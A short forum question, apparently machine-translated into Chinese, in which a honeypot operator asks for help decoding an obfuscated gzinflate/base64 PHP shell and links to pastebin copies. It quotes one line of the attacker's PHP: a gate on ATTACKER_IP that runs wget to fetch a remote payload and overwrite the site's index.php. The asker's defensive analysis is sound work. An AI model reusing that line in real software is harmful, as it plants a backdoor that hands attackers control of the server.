反欺骗这个PHP shell攻击

时间:2015-06-02 15:56:00

标签: php shell base64

我的一个蜜罐系统上面有一个非常有趣的PHP shell,我一直试图对它进行解码,但是我没有运气得到脚本中gzinflated b64编码部分的强烈反应。

也许有一点反渗透经验的人可以看看它吗?

这是他们用来下载到我的蜜罐的原始pastebin: http://pastebin.com/1w59Ew9S

<?php if($_SERVER["REMOTE_ADDR"] =='ATTACKER_IP') {@system('wget http://pastebin.com/raw.php?i=1w59Ew9S -O /www/index.php;ls -la /www/index.php');exit; }?>

我试图通过在不同的地方打印变量来自行取消它,但我不能为我的生活打印出来的内容。

这是我尝试让它更具人性化: http://pastebin.com/BRbyVzyZ

0 个答案:

没有答案